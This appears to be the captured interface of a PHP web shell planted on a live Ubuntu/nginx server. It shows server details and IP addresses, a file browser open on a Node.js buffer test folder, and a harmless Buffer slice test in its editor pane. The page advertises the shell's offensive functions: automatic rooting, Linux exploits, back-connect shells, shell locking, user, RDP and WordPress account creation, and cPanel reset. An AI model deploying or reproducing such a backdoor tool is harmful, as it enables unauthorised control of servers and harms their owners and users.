Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
buffer /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
node
[ DIR ]
drwxr-xr-x
_polyfill.js
4.3
KB
-rw-r--r--
base64.js
1.58
KB
-rw-r--r--
basic.js
1.77
KB
-rw-r--r--
compare.js
1.17
KB
-rw-r--r--
constructor.js
4.31
KB
-rw-r--r--
from-string.js
3.25
KB
-rw-r--r--
is-buffer.js
664
B
-rw-r--r--
methods.js
2.82
KB
-rw-r--r--
slice.js
958
B
-rw-r--r--
static.js
481
B
-rw-r--r--
to-string.js
6.88
KB
-rw-r--r--
write.js
3.4
KB
-rw-r--r--
write_infinity.js
1.14
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : slice.js
if (process.env.OBJECT_IMPL) global.TYPED_ARRAY_SUPPORT = false var B = require('../').Buffer var test = require('tape') test('modifying buffer created by .slice() modifies original memory', function (t) { if (!B.TYPED_ARRAY_SUPPORT) return t.end() var buf1 = new B(26) for (var i = 0; i < 26; i++) { buf1[i] = i + 97 // 97 is ASCII a } var buf2 = buf1.slice(0, 3) t.equal(buf2.toString('ascii', 0, buf2.length), 'abc') buf2[0] = '!'.charCodeAt(0) t.equal(buf1.toString('ascii', 0, buf2.length), '!bc') t.end() }) test('modifying parent buffer modifies .slice() buffer\'s memory', function (t) { if (!B.TYPED_ARRAY_SUPPORT) return t.end() var buf1 = new B(26) for (var i = 0; i < 26; i++) { buf1[i] = i + 97 // 97 is ASCII a } var buf2 = buf1.slice(0, 3) t.equal(buf2.toString('ascii', 0, buf2.length), 'abc') buf1[0] = '!'.charCodeAt(0) t.equal(buf2.toString('ascii', 0, buf2.length), '!bc') t.end() })
Close